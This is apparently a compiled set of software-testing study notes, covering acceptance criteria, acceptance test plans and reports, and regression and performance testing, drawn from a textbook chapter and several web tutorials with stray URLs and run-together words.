• Identify the regulatory bodies that must certify the system?

Installability and Upgradability The purpose of system installability andupgradability is to ensure that the system can be correctly installed and upgradedin the customer environment. If for some reason the customer wants to uninstallor downgrade the system software, it is required to be done smoothly. Installationand upgradation of a system is planned by identifying the major milestones and


contingency steps. The system installation and upgradation process document mustbe available with specific steps. The acceptance criteria of system installation andupgradation are as follows:

• The document must identify the person to install the system, for example,the end user or a trained technician from the supplier side.

• Over what range of platforms, configurations, and versions of supportsoftware is the installation or upgradation process expected to work? Thehardware and software requirements must be clearly explained in thedocument.

• Can the installation or upgradation process change the user’s existing envi-ronment? If yes, the risks of this change should be clearly documented.

• The installation or upgradation process should include diagnostic and cor-rective steps to be used in the event of the process not progressing asexpected.

• The installation or upgradation process should contain a workable unin-stall, downgrade, or backoff process in case a specific installation does notproceed as expected.

• The installation or upgradation process should correctly work from all ofthe various delivery media, such as download via File Transfer Protocol(FTP), CD-ROM, and DVD.

• If the system includes a licensing and registration process, it should worksmoothly and should be documented.

• The installation or upgradation instructions should be complete, correct,and usable.

• The installation or upgradation process should be verified during systemtesting.

• There should be zero defects outstanding against a system installation orupgradation process.

Scalability The scalability of a system is defined as its ability to effectivelyprovide acceptable performance as the following quantities increase: (i) geographicarea of coverage of a system, (ii) system size in terms of the number of elementsin the system, (iii) number of users, and (iv) volume of workload per unit time.A system may work as expected in limited-use scenarios but may not scale upvery well. The following questions must be addressed in specifying the scalabilityacceptance criteria:

• How many concurrent users is the system expected to handle?

• How many transactions per unit time is the system expected to process?

• How many database records is the system expected to support?

• How many elements, or objects, must be managed in live operation?

• What is the largest geographic area the system can cover?

14.4 ACCEPTANCE TEST PLAN 461

Documentation The quality of the system user’s guide must be high. The doc-umentation acceptance criteria are formulated as follows:

• All the user documents should be reviewed and approved by the soft-ware quality assurance group for correctness, accuracy, readability, andusefulness.

• The on-line help should be reviewed and signed off by the software qualityassurance group.

14.3 SELECTION OF ACCEPTANCE CRITERIA

The acceptance criteria discussed above provide a broad idea about customer needsand expectations, but those are too many and very general. The customer needs toselect a subset of the quality attributes and prioritize them to suit their specific sit-uation. Next, the customer identifies the acceptance criteria for each of the selectedquality attributes. When the customer and the software vendor reach an agreementon the acceptance criteria, both parties must keep in mind that satisfaction of theacceptance criteria is a trade-off between time, cost, and quality. As Ed Yourdonopined, sometimes less than perfect is good enough [6]. Only business goals andpriority can determine the degree of “less than perfect” that is acceptable to boththe parties. Ultimately, the acceptance criteria must be related to the business goalsof the customer’s organization.

Many organizations associated with different application domains haveselected and customized existing quality attributes to define quality for themselves,taking into consideration their specific business and market situation. For example,IBM used the quality attribute list CUPRIMDS—capability, usability, perfor-mance, reliability, installation, maintenance, documentation, and service—for itsproducts [7]. Similarly, for web-based applications [8], a set of quality attributesare identified in decreasing order of priority: reliability, usability, security,availability, scalability, maintainability, and time to market. Such a prioritizationscheme is often used in specific application domains. For example, usabilityand maintainability take precedence over performance and reliability for a wordprocessor software. On the other hand, it might be the other way around for areal-time operating system or telecommunication software.

14.4 ACCEPTANCE TEST PLAN

Planning for acceptance testing begins as soon as the acceptance criteria are known.Early development of an acceptance test plan (ATP) gives us a good picture of thefinal product. The purpose of an ATP is to develop a detailed outline of the processto test the system prior to making a transition to the actual business use of thesystem. Often, the ATP is delivered by the vendor as a contractual agreement, so thatthe business acceptance testing can be undertaken within the vendor’s developmentorganization to ensure that the system eventually passes the acceptance test.


In developing an ATP, emphasis is put on demonstrating that the systemworks according to the customer’s expectation, rather than passing a set of com-prehensive tests. In any case, the system is expected to have already passed a set ofcomprehensive tests during system-level testing. The ATP must be kept very simplebecause the audience of this plan may include people from diverse backgrounds,such as marketing and business managers. Some people argue that the ATP isredundant and unnecessary if a comprehensive system test plan is developed. Webelieve that even if a system test plan is adequate, acceptance tests usually uncoveradditional significant problems. Moreover, user’s concerns are not addressed duringsystem-level testing.

An ATP needs to be written and executed by the customer’s special usergroup. The user group consists of people from different backgrounds, such assoftware quality assurance engineers, business associates, and customer supportengineers. In addition, the acceptance test cases are executed at the user’s opera-tional environment, whereas the system-level test cases are executed in a laboratoryenvironment. An overall test plan for acceptance testing and description of specifictests are documented in the ATP. The structure of a typical ATP is outlined inTable 14.1.

The introduction section of the ATP describes the structure of the test planand what we intend to accomplish with this test plan. This section typicallyincludes (i) test project name, (ii) revision history, (iii) terminology and defini-tions, (iv) names of the approvers and the date of approval, (v) an overview of theplan, and (vi) references.

For each quality category from the acceptance criteria signed-off documenttwo subsections are created: operational environment and test case specification.The operational environment deals with discussion on site preparation for the exe-cution of the acceptance test cases. Test cases are specified for each acceptancecriteria within the quality category.

An outline of the timeline of execution of acceptance tests is provided inthe schedule section of the ATP. Acceptance test execution is not intended tobe exhaustive, and therefore it does not continue for long. The acceptance test

TABLE 14.1 Outline of ATP

1. Introduction

2. Acceptance test category. For each category of acceptance criteria:

(a) Operational environment

(b) Test case specification

(i) Test case ID number

(ii) Test title

(iii) Test objective

(iv) Test procedure

3. Schedule

4. Human resources

14.5 ACCEPTANCE TEST EXECUTION 463

may take up to six weeks for a large system. The point here is that comprehensiveacceptance testing, to the same extent and depth as targeted by system-level testing,is not required to demonstrate that the acceptance criteria are satisfied by thesystem.

The human resources section of the ATP deals with (i) the identification ofthe acceptance testers that form the client organization and (ii) their specific rolesin the execution of acceptance test cases. The section includes acceptance test sitepreparation, overseeing installation of new hardware, upgrading the software, andsetting up of the networks. These are the people who are knowledgeable in theoperational environment and business operations. In addition, the human resourcesrequirement from the supplier organization during the acceptance testing is includedin this section. These engineers are usually from the supplier’s system test group,who participated in testing the system.

The ATP is reviewed and approved by the relevant groups, such as the mar-keting, customer support, and software quality assurance groups. It can be sharedwith the system supplier organization.

14.5 ACCEPTANCE TEST EXECUTION

The acceptance test cases are divided into two subgroups. The first subgroup con-sists of basic test cases, and the second consists of test cases that are more complexto execute. The acceptance tests are executed in two phases. In the first phase, thetest cases from the basic test group are executed. If the test results are satisfac-tory, then the second phase, in which the complex test cases are executed, is takenup. In addition to the basic test cases, a subset of the system-level test casesare executed by the acceptance test engineers to independently confirm the testresults. Obviously, a key question is: Which subset of the system-level test casesare selected? It is recommended to randomly select 5–10 test cases from eachtest category. If a very large fraction, say more than 0.95, of the basic test casespass, then the second phase can proceed. It may be counterproductive to carryout the execution of the more complex tests if a significant fraction of the basictests fail.

Acceptance test execution is an important activity performed by the customerwith much support from the developers. The activity includes the following detailedactions:

• The developers train the customer on the usage of the system.

• The developers and the customer coordinate the fixing of any problemdiscovered during acceptance testing.

• The developers and the customer resolve the issues arising out of anyacceptance criteria discrepancy.

System-level test personnel from the development organization travel to thecustomer location where the acceptance tests are to be conducted. They assist the


TABLE 14.2 ACC Document Information

1. ACC number A unique number

2. Acceptance criteria affected Existing acceptance criteria

3. Problem/issue description Brief description of issue

4. Description of change required Description of changes needed to be done to originalacceptance criterion

5. Secondary technical impacts Description of impact it will have on system

6. Customer impacts Impact it will have on end user

7. Change recommended by Name of acceptance test engineer(s)

8. Change approved by Name of approver(s) from both parties

customer in preparing a test site and train the acceptance test engineers on how touse the system. They provide the earlier system-level test results to the customer’stest engineers in order to make informal decisions about the direction and focus ofthe acceptance testing effort. In addition, the on-site system test engineers answerthe customer’s questions about the system and assist the acceptance test engineersin executing the acceptance tests.

Any defect encountered during acceptance testing are reported to the softwaredevelopment organization through the on-site system test engineers. The defects aresubmitted through the defect tracking system. The software build is retested by thesupplier and a satisfactory software image is made available to the customer forcontinuation of acceptance testing when the defects are fixed. The failed tests arerepeated after the system is upgraded with a new software image. An agreementmust be reached between the on-site system test engineers and the acceptancetest engineers when to accept a new software image for acceptance testing. Thenumber of times the system can be upgraded to a new software image duringacceptance testing is negotiated between the customer and the supplier. Multiplefailures of a system during acceptance testing are an indication of poor systemquality.

It is possible that an acceptance test engineer may encounter issues relatedto acceptance criteria during the execution of acceptance test cases. The systemmay not provide services to the users as described in the acceptance criteria. Anydeviation from the acceptance criteria discovered at this stage may not be fixedimmediately. The acceptance test engineer may create an acceptance criteria change(ACC) document to communicate the deficiency in the acceptance criteria to thesupplier. A representative format of an ACC document is shown in Table 14.2. AnACC report is generally given to the supplier’s marketing department through theon-site system test engineers.

14.6 ACCEPTANCE TEST REPORT

Acceptance test activities are designed to reach one of three conclusions: Acceptthe system as delivered, accept the system after the requested modifications have

14.6 ACCEPTANCE TEST REPORT 465

been made, or do not accept the system. Usually some useful intermediate decisionsare made before making the final decision:

• A decision is made about the continuation of acceptance testing if theresults of the first phase of acceptance testing are not promising. One mayrecall that the basic tests are executed in the first phase.

• If the test results are unsatisfactory, changes will be made to the systembefore acceptance testing can proceed to the next phase.

The intermediate decisions are made based on evaluation of the results ofthe first phase of testing. Moreover, during the execution of acceptance tests, thestatus of testing is reviewed at the end of every working day by the leader ofthe acceptance test team, on-site system test engineers, and project managers ofthe customer and the supplier. The acceptance team prepares a test report whichforms the basis of discussion at the review meeting before they meet for a review.A template of the test report is given in Table 14.3.

The test report is reviewed on a daily basis to understand the status andprogress of acceptance testing. If serious problems are encountered during accep-tance testing, the project manager flags the issues to the senior management.

At the end of the first and the second phases of acceptance testing an accep-tance test report is generated by the test team leader. A template for a test reportis outlined in Table 14.4. Most of the information from the test status report canbe used in the acceptance test summary report.

The report identifier uniquely identifies the report. It is used to keep track ofthe document under version control.

The summary section summarizes what acceptance testing activities tookplace, including the test phases, releases of the software used, and the test envi-ronment. This section normally includes references to the ATP, acceptance criteria,and requirements specification.

The variances section describes any difference between the testing that wasplanned and the actual testing carried out. It provides an insight into a process forimproving acceptance test planning in the future.

TABLE 14.3 Structure of Acceptance Test Status Report

1. Date Acceptance report date

2. Test case execution status Number of test cases executed today

Number of test cases passing

Number of test cases failing

3. Defect identifier Submitted defect number

Brief description of issue

4. ACC number(s) Acceptance criteria change document number(s), if any

5. Cumulative test execution status Total number of test cases executed

Total number of test cases passing

Total number of test cases failing

Total number of test cases not executed yet


TABLE 14.4 Structure of Acceptance Test Summary Report

1. Report identifier

2. Summary

3. Variances

4. Summary of results

5. Evaluation

6. Recommendations

7. Summary of activities

8. Approval

In the summary of results section of the document test results are summarized.The section gives the total number of test cases executed, the number of passing testcases, and the number of failing test cases; identifies all the defects; and summarizesthe acceptance criteria to be changed.

The evaluation section provides an overall assessment of each category ofthe quality attributes identified in the acceptance criteria document, including theirlimitations. This evaluation is based on the test results from each category of thetest plan. The deviations of the acceptance criteria that are captured in the ACCduring the acceptance testing are discussed.

The recommendations section includes the acceptance test team’s overall rec-ommendation: (i) unconditionally accept the system, (ii) accept the system subjectto certain conditions being met, or (iii) reject the system. However, the ultimatedecision is made by the business experts of the supplier and the buyer organi-zation.

The summary of activities section summarizes the testing activities and themajor events. This section includes information about the resources consumed bythe various activities. For example, the total manpower involved in and the timespent for each of the major testing activities are given. This section is useful tomanagement for accurately estimating future acceptance testing efforts.

Finally, the names and titles of all the people that will approve this reportare listed in the approvals section. Ideally, the approvers of this report shouldbe the same people who approved the corresponding ATP because the summaryreport describes all the activities outlined in the ATP. If some of the reviewershave minor disagreements, they may note their views before signing off on thedocument.

14.7 ACCEPTANCE TESTING IN eXtremePROGRAMMING

In the XP[9] framework user stories are used as acceptance criteria. The userstories are used to derive time estimates for each development iteration in releaseplanning (time-to-market acceptance criteria) and acceptance tests. The user storiesare written by the customer as things that the system needs to do for them. The

14.8 SUMMARY 467

stories are usually about two to three sentences of text written using the customer’sterminology. Several acceptance tests are created to verify that the user story hasbeen correctly implemented. Acceptance tests are specified in a format that isclear enough that the customer can understand and specific enough that it can beexecuted.

The customer is responsible for verifying the correctness of the acceptancetests and reviewing the test results [10]. The acceptance test results are reviewed bythe customer to decide what failed tests are of highest priority that must pass duringthe next iteration. A story is incomplete until it passes its associated acceptancetests.

Acceptance tests are executed by an acceptance test group, which is a partof the development team. Ideally, acceptance tests should be automated usingeither the unit testing framework or a separate acceptance testing frameworkbefore coding. Acceptance test engineers and customers can run the tests multipletimes per day as a regression acceptance test suite after the acceptance testsare automated. An automated acceptance test suite does not lose its value evenafter the customer has approved the successful implementation of the user storyin a development iteration. The acceptance tests take on the role of regressiontests to ensure that subsequent changes to the system do not affect the unalteredfunctionality.

regression testing

What is Regression Testing?

Regression means retesting the unchanged parts of the application. Test cases are re-executed in order to check whether previous functionality of application is working fine and new changes have not introduced any new bugs. This test can be performed on a new build when there is significant change in original functionality or even a single bug fix.

This is the method of verification. Verifying that the bugs are fixed and the newly added features have not created in problem in previous working version of software.

Testers perform functional testing when new build is available for verification. The intend of this test is to verify the changes made in the existing functionality and newly added functionality. When this test is done tester should verify if the existing functionality is working as expected and new changes have not introduced any defect in functionality that was working before this change. Regression test should be the part of release cycle and must be considered in test estimation. Regression testing is usually performed after verification of changes or new functionality. But this is not the case always. For the release taking months to complete, regression tests must be incorporated in the daily test cycle. For weekly releases regression tests can be performed when functional testing is over for the changes.

Why Regression Test?

What is Regression Testing?

Regression testing a black box testing technique that consists of re-executing those tests that are impacted by the code changes. These tests should be executed as often as possible throughout the software development life cycle.

Types of Regression Tests:

• Final Regression Tests: - A "final regression testing" is performed to validate the build that hasn't changed for a period of time. This build is deployed or shipped to customers.

• Regression Tests: - A normal regression testing is performed to verify if the build has NOT broken any other parts of the application by the recent code changes for defect fixing or for enhancement.

1. Regular Regression Testing: A Regular Regression testing is done between test cycles to ensure that the defect fixes that are done and the functionality that were working with the earlier test cycle continue to work.

2. Final Regression Testing: A “final regression testing” is performed to validate the build that hasn’t changed for a period of time. This build is deployed or shipped to customers.

Selecting Regression Tests:

• Requires knowledge about the system and how it affects by the existing functionalities.

• Tests are selected based on the area of frequent defects. • Tests are selected to include the area, which has undergone code changes many

a times. • Tests are selected based on the criticality of the features.

http://cdn.softwaretestinghelp.com/wp-content/qa/uploads/2007/08/regression-testing.jpg

Regression Testing Steps:

Regression tests are the ideal cases of automation which results in better Return On Investment (ROI).

• Select the Tests for Regression. • Choose the apt tool and automate the Regression Tests • Verify applications with Checkpoints • Manage Regression Tests/update when required • Schedule the tests • Integrate with the builds • Analyze the results

Need of Regression Testing

Regression Testing is required when there is a

• Change in requirements and code is modified according to the requirement • New feature is added to the software • Defect fixing • Performance issue fix

The purpose of regression testing is to confirm that a recent program or code change has not adversely affected existing features.

Regression testing is nothing but full or partial selection of already executed test cases which are re-executed to ensure existing functionalities work fine.

This testing is done to make sure that new code changes should not have side effects on the existing functionalities. It ensures that old code still works once the new code changes are done.

Regression testing is initiated when programmer fix any bug or add new code for new functionality to the system. There can be many dependencies in newly added and existing functionality. It is a quality measure to check that new code complies with old code and unmodified code is not getting affected. Most of the time testing team has task to check the last minute changes in the system. In such situation testing only affected application area in necessary to complete the testing process in time with covering all major system aspects.

This test is very important when there is continuous change/improvements added in the application. The new functionality should not negatively affect existing tested code.

DEFINITION

Regression testing is a type of software testing that intends to ensure that changes (enhancements or defect fixes) to the software have not adversely affected it.

Regression testing: During confirmation testing the defect got fixed and that part of the application started working as intended. But there might be a possibility that the fix may have introduced or uncovered a different defect elsewhere in the software. The way to detect these ‘unexpected side-effects’ of fixes is to do regression testing. The purpose of a regression testing is to verify that modifications in the software or the environment have not caused any unintended adverse side effects and that the system still meets its requirements. Regression testing are mostly automated because in order to fix the defect the same test is carried out again and again and it will be very tedious to do it manually. Regression tests are executed whenever the software changes, either as a result of fixes or new or changed functionality.

Regression Testing Techniques

Software maintenance is an activity which includes enhancements, error corrections, optimization and deletion of existing features. These modifications may cause the system to work incorrectly . Therefore , Regression Testing becomes necessary. Regression Testing can be carried out using following techniques:

1. Retest All

• This is one of the methods for regression testing in which all the tests in the existing test bucket or suite should be re-executed. This is very expensive as it requires huge time and resources.

2. Regression Test Selection

• Instead of re-executing the entire test suite, it is better to select part of test suite to be run

• Test cases selected can be categorized as 1) Reusable Test Cases 2) Obsolete Test Cases.

• Re-usable Test cases can be used in succeeding regression cycles. • Obsolete Test Cases can't be used in succeeding cycles.

3. Prioritization of Test Cases

• Prioritize the test cases depending on business impact, critical & frequently used functionalities . Selection of test cases based on priority will greatly reduce the regression test suite.

How to do Regression Testing

A test methodology for an effective regression testing is made up of the following steps:

1. Performing an initial “Smoke” or “Sanity” test 2. Understanding the criteria to select the test cases for Regression Testing 3. Prioritization of test cases 4. Methodology for select test cases 5. Resetting the test cases for test execution 6. Concluding the result of a regression test cycle

1. Performing an initial “Smoke” or “Sanity” test

A subset of the regression test cases can be set aside as smoke tests. A smoke test is a group of test cases that establish that the system is stable and all major functionality is present and works under “normal” conditions. Smoke tests are often automated, and the selection of the test cases are broad in scope. The smoke tests might be run before deciding to proceed with further testing (why dedicate resources to testing if the system is very unstable). The purpose of smoke tests is to demonstrate stability, not to find bugs with the system. Sanity testing is done to test that major functionality of the system is working or not. If sanity test fails, the build is rejected to save the time and costs involved in a more rigorous testing.

2. Criteria to select test cases for Regression Testing

It was found from industry data that good number of the defects reported by customers were due to last minute bug fixes creating side effects and hence selecting the test case for regression testing is an art and not that easy.

http://en.wikipedia.org/wiki/Smoke_testing

http://en.wikipedia.org/wiki/Sanity_testing

The selection of test cases for regression testing:

• Requires knowledge on the bug fixes and how it affects the system. • Includes the area of frequent defects. • Includes the area which has undergone many/recent code changes. • Includes the area which is highly visible to the users. • Includes the core features of the product which are mandatory requirements of

the customer.

Selection of test cases for regression testing depends more on the criticality of bug fixes than the criticality of the defect itself. A minor defect can result in major side effect and a bug fix for an extreme defect can have no or just a minor side effect. So the test engineer needs to balance these aspects for selecting the test cases for regression testing.

3. Prioritization of test cases

Prioritizing the test cases depends on the business impact, critical and frequently used functionality. Selection of test cases based on priority will reduce the test suit. The test cases may be classified into three categories:

Priority-0: These test cases can be called as Sanity test cases which check the basic functionality and are run for accepting the build for further testing. These are also run when a project goes through major changes. These test cases deliver a very high project value to both development teams and to customers.

Priority-1: Uses the basic and normal setup and these test cases deliver high project value to both development teams and customers.

Priority-2: These test cases deliver moderate project value and are executed as a part of software testing life cycle and selected for regression on need basis.

http://cdn.lucemorker.com/blog/wp-content/uploads/2014/01/reg-test-pic-2.jpg

4. Methodology for selecting test cases

Once the test cases are prioritized, test cases can be selected. There could be several approaches to regression testing which need to be decided on a case by case basis. For example:

Case 1: If criticality and impact of the defect fixes are low, then it is enough to select few test cases from Test Case DataBase (TCDB) and execute them. These can fall under any priority (0, 1, or 2).

Case 2: If the criticality and the impact of the bug fixes are Medium, then we need to execute all Priority-0 and Priority-1 test cases. If bug fixes need additional test cases from Priority-2, then those test cases can also selected and used for regression testing. Selecting Priority-2 test cases in this case is desirable but not a must.

Case 3: If the criticality and impact of the bug fixes are High, then we need to execute all Priority-0, Priority-1 and carefully selected Priority-2 test cases.

The above methodology requires Impact Analysis of bug fixes for all defects. It can be a time consuming process. If there is not enough time and the risk of not doing Impact Analysis is low, then the following alternative methodologies:

1. Regress All: For regression testing, all priority 0, 1, and 2 test cases are re-run. 2. Priority bases Regression: For regression testing, based on the priority, all

priority 0, 1, and 2 test cases are run in order, based on the availability of time. 3. Random Regression: Random test cases are selected and executed. 4. Regress Changes: Code changes are compared to the last cycle of testing and

test cases are selected based on their impact on the code.

An effective regression strategy is usually a combination of all of the above.

http://cdn.lucemorker.com/blog/wp-content/uploads/2014/01/reg-test-pic-3.jpg

5. Resetting the test cases for execution

Resetting of the test cases need to be done with the following considerations:

1. When there is a major change in the product. 2. Where there is a situation, the expected results of the test cases could be quite

different from previous cycles. 3. Whenever existing application functionality is removed, the related test cases can

be reset. 4. When there is a change in the build procedure which affects the product. 5. Large release cycle where some test cases were not executed for a long time. 6. You are in the final regression test cycle with a few selected test cases.

6. Concluding the Result of Regression Testing

Regression testing uses only one build for testing (if not, it is strongly recommended). It is expected that all 100% of those test cases pass using the same build. In situations where the pass % is not 100, the test manager can look at the previous results of the test case to conclude the expected result.

1. If the result of a particular test case was PASS using the previous builds and FAIL in the current build, then regression failed. We need to get a new build and start the testing from scratch after resetting the test cases.

2. If the result of a particular test case was a FAIL using the previous builds and a PASS in the current build, then it is easy to assume the bug fixes worked.

3. If the result of a particular test case was a FAIL using the previous builds and a FAIL in the current build and if there are no bug fixes for this particular test case, it may mean that the result of this test case shouldn’t be considered for the pass %. This may also mean that such test cases shouldn’t be selected for regression.

ELABORATION

The likelihood of any code change impacting functionalities that are not directly associated with the code is always there and it is essential that regression testing is conducted to make sure that fixing one thing has not broken another thing. During regression testing, new test cases are not created but previously created test cases are re-executed.

LEVELS APPLICABLE TO

Regression testing can be performed during any level of testing (Unit, Integration, System, or Acceptance) but it is mostly relevant during System Testing.

EXTENT

In an ideal case, a full regression test is desirable but oftentimes there are time/resource constraints. In such cases, it is essential to do an impact analysis of the changes to identify areas of the software that have the highest probability of being affected by the change and that have the highest impact to users in case of malfunction and focus testing around those areas.

Due to the scale and importance of regression testing, more and more companies and projects are adopting regression test automation tools.

How Much Regression Testing? This depends on the scope of newly added feature. If the scope of the fix or feature is large then the application area getting affected is quite large and testing should be performed thoroughly including all the application test cases. But this can be effectively decided when tester gets input from developer about the scope, nature and amount of change.

Types of Regression tests: As these are repetitive tests, test cases can be automated so that set of test cases can be easily executed on new build. Regression test cases needs to be selected very carefully so that in minimum set of test cases maximum functionality is covered. These set of test cases need continuous improvements for newly added functionality. It becomes very difficult when the application scope is very huge and there are continuous increments or patches to the system. In such cases selective tests needs to be executed in order to save testing cost and time. These selective test cases are picked based on the enhancements done to the system and parts where it can affect the most.

What We Do in Regression Test?

• Rerunning the previously conducted tests • Comparing current results with previously executed test results

This is a continuous process performed at various stages throughout the software testing life cycle. A best practice is to conduct regression test after the sanity or smoke testing and at the end of functional testing for a short release.

To conduct effective testing, regression test plan should to be created. This plan should outline the regression testing strategy and exit criteria. Performance testing is also the part of this test to make sure system performance is not affected due to the changes made in the system components.

Regression testing best practices: Run automated test cases every day in the evening so that any regression side effects can be fixed in next days build. This way it reduces the release risk by covering almost all regression defects in early stages rather than finding and fixing those at the end of the release cycle.

http://www.softwaretestinghelp.com/smoke-testing-and-sanity-testing-difference/

http://www.softwaretestinghelp.com/smoke-testing-and-sanity-testing-difference/

http://www.softwaretestinghelp.com/test-plan-sample-softwaretesting-and-quality-assurance-templates/

http://www.softwaretestinghelp.com/category/testing-best-practices/

Regression Testing Tools

Automated Regression Testing is the testing area where we can automate most of the testing efforts. We run all the previously executed test cases on new build. This means we have test case set available and running these test cases manually is time consuming. We know the expected results so automating these test cases is time saving and efficient regression test method. Extent of automation depends on the number of test cases that are going to remain applicable over the time. If test cases are varying time to time as application scope goes on increasing then automation of regression procedure will be the waste of time.

Most of the regression test tools are record and playback type. You will record the test cases by navigating through the AUT (application under test) and verify whether expected results are coming or not.

Regression Of GUI application: It is difficult to perform GUI (Graphical User Interface) regression test when GUI structure is modified. The test cases written on old GUI either becomes obsolete or need to modify. Reusing the regression testing test cases means GUI test cases are modified according to new GUI. But this task becomes cumbersome if you have large set of GUI test cases.

Selecting test cases for regression testing

It was found from industry data that good number of the defects reported by customers were due to last minute bug fixes creating side effects and hence selecting the test case for regression testing is an art and not that easy. Effective Regression Tests can be done by selecting following test cases -

• Test cases which have frequent defects • Functionalities which are more visible to the users • Test cases which verify core features of the product • Test cases of Functionalities which has undergone more and recent changes • All Integration Test Cases • All Complex Test Cases • Boundary value test cases • Sample of Successful test cases • Sample of Failure test cases

Regression Testing Tools

If your software undergoes frequent changes , regression testing costs will escalate. In such cases , Manual execution of test cases increases test execution time as well as costs.

http://www.softwaretestinghelp.com/automated-regression-testing-challenges-in-agile-testing-environment/

Automation of regression test cases is the smart choice in such cases. Extent of automation depends on the number of test cases that remain re-usable for successive regression cycles. Following are most important tools used for both functional and regression testing:

Quick Test Professional (QTP):HP Quick Test Professional is automated software designed to automate functional and regression test cases. It uses VbScript language for automation. It is a Data driven , Keyword based tool.

Rational Functional Tester (RFT):IBM's rational functional tester is a java tool used to automate the test cases of software applications. This is primarily used for automating regression test cases and it also integrates with Rational Test Manager.

Selenium : This is an open source tool used for automating web applications. Selenium can be used for browser based regression testing.

Regression Testing and Configuration Management

Configuration Management during Regression Testing becomes imperative in Agile Environments where code is being continuously modified. To ensure effective regression tests , observe the following :

• Code being regression tested should be under a configuration management tool • No changes must be allowed to code , during the regression test

phase. Regression test code must be kept immune to developer changes. • The database used for regression testing must be isolated . No database

changes must be allowed

Difference between Re-testing and regression testing:

Retesting means testing the functionality or bug again to ensure the code is fixed. If it is not fixed, defect needs to be re-opened. If fixed, defect is closed.

Regression testing means testing your software application when it undergoes a code change to ensure that the new code has not affected other parts of the software.

SOME BENEFITS OF REGRESSION TESTING 1. Regression testing increases our chances of detecting bugs caused by changes to a

software and application- either enhancements or defect fixes. Also keep one thing in mind that we also don’t give any sort of guarantee that for performing regression testing there are never any sort of side effects also.

http://www.guru99.com/quick-test-professional-qtp-tutorial.html

http://www.guru99.com/vbscript-tutorials-for-beginners.html

http://www.guru99.com/java-tutorial.html

http://www.guru99.com/selenium-tutorial.html

http://testingbasicinterviewquestions.blogspot.in/2012/01/what-is-regression-testing-explain-it.html

2. Regression testing also detects undesirable side caused always by changing the operating environment.

3. The set about regression test is much useful for a new way about doing integration

testing. This new mode is quite faster and little confusing than the old way about doing integration testing- but you always need a some sort of set about regression test to do it.

Challenges in Regression Testing:

Following are the major testing problems for doing regression testing:

• With successive regression runs, test suites become fairly large. Due to time and budget constraints, the entire regression test suite cannot be executed

• Minimizing test suite while achieving maximum test coverage remains a challenge

• Determination of frequency of Regression Tests , i.e., after every modification or every build update or after a bunch of bug fixes, is a challenge.

An effective regression strategy, save organizations both time and money. As per one of the case study in banking domain, regression saves upto 60% time in bug fixes(which would have been caught by regression tests) and 40% in money

Regression testing is essential for large software applications, as it is often difficult to know whether changing part of an issue has created a new issue for a different part of the application. For example, a change to a bank application loan module may result in the failure of a monthly transaction report. In most cases, issues may appear to be unrelated, but may actually be the root of frustration among application developers. Other situations requiring regression testing include detecting whether certain changes accomplish an intended goal or testing for new dangers associated with issues that reemerge after a trouble-free period.

Modern regression testing is primarily handled via specialized commercial testing tools that take existing software snapshots that are then compared after applying a specific change. It is almost impossible for human testers to perform the same tasks as efficiently as automated software testers. This is especially true with large and complex software applications within vast computing environments such as banks, hospitals, manufacturing enterprises and large retailers.

WHY WE PERFORM REGRESSION TESTING? Regression testing will be considered after a bug fixed or when any area of functionality changed. During bug fixing method some part of coding may be changed or even functionality may be also manipulated so due to this change we have to perform Regression Testing.

Performance testing

• It is a type of non-functional testing. • Performance testing is testing that is performed, to determine how fast some

aspect of a system performs under a particular workload. • It can serve different purposes like it can demonstrate that the system meets

performance criteria. • It can compare two systems to find which performs better. Or it can measure

what part of the system or workload causes the system to perform badly. • This process can involve quantitative tests done in a lab, such as measuring the

response time or the number of MIPS (millions of instructions per second) at which a system functions.

• Why to do performance testing:

o Improve user experience on sites and web apps o Increase revenue generated from websites o Gather metrics useful for tuning the system o Identify bottlenecks such as database configuration o Determine if a new release is ready for production o Provide reporting to business stakeholders regarding performance against

expectations

What is Performance Testing?

Performance testing, a non-functional testing technique performed to determine the system parameters in terms of responsiveness and stability under various workload. Performance testing measures the quality attributes of the system, such as scalability, reliability and resource usage.

Performance Testing Techniques:

• Load testing - It is the simplest form of testing conducted to understand the behavior of the system under a specific load. Load testing will result in measuring important business critical transactions and load on the database, application server, etc., are also monitored.

• Stress testing - It is performed to find the upper limit capacity of the system and also to determine how the system performs if the current load goes well above the expected maximum.

• Soak testing - Soak Testing also known as endurance testing, is performed to determine the system parameters under continuous expected load. During soak tests the parameters such as memory utilization is monitored to detect memory

http://istqbexamcertification.com/what-is-performance-testing-in-software/

leaks or other performance issues. The main aim is to discover the system's performance under sustained use.

• Spike testing - Spike testing is performed by increasing the number of users suddenly by a very large amount and measuring the performance of the system. The main aim is to determine whether the system will be able to sustain the workload.

• Configuration testing

Rather than testing for performance from a load perspective, tests are created to determine the effects of configuration changes to the system's components on the system's performance and behavior. A common example would be experimenting with different methods of load-balancing.

• Isolation testing

Isolation testing is not unique to performance testing but involves repeating a test execution that resulted in a system problem. Such testing can often isolate and confirm the fault domain.

* Endurance testing - is done to make sure the software can handle the expected load over a long period of time.

Volume testing - Under Volume Testing large no. of. Data is populated in database and the overall software system's behavior is monitored. The objective is to check software application's performance under varying database volumes. Scalability testing - The objective of scalability testing is to determine the software application's effectiveness in "scaling up" to support an increase in user load. It helps plan capacity addition to your software system.

Load testing is the simplest form of performance testing. A load test is usually conducted to understand the behavior of the system under a specific expected load. This load can be the expected concurrent number of users on the application performing a specific number of transactions within the set duration. This test will give out the response times of all the important business critical transactions. If the database, application server, etc. are also monitored, then this simple test can itself point towards bottlenecks in the application software.

Stress testing is normally used to understand the upper limits of capacity within the system. This kind of test is done to determine the system's robustness in terms of extreme load and helps application administrators to determine if the system will perform sufficiently if the current load goes well above the expected maximum.

Soak testing, also known as endurance testing, is usually done to determine if the system can sustain the continuous expected load. During soak tests, memory utilization

http://en.wikipedia.org/wiki/Load_balancing_%28computing%29

http://en.wikipedia.org/wiki/Load_testing

http://en.wikipedia.org/wiki/Application_software

http://en.wikipedia.org/wiki/Transaction_processing

http://en.wikipedia.org/wiki/Database

http://en.wikipedia.org/wiki/Application_server

http://en.wikipedia.org/wiki/Bottleneck

http://en.wikipedia.org/wiki/Stress_testing

http://en.wikipedia.org/wiki/Soak_testing

is monitored to detect potential leaks. Also important, but often overlooked is performance degradation, i.e. to ensure that the throughput and/or response times after some long period of sustained activity are as good as or better than at the beginning of the test. It essentially involves applying a significant load to a system for an extended, significant period of time. The goal is to discover how the system behaves under sustained use.

Spike testing is done by suddenly increasing the load generated by a very large number of users, and observing the behaviour of the system. The goal is to determine whether performance will suffer, the system will fail, or it will be able to handle dramatic changes in load.

Performance Testing Process:

Attributes of Performance Testing:

• Speed • Scalability • Stability • reliability

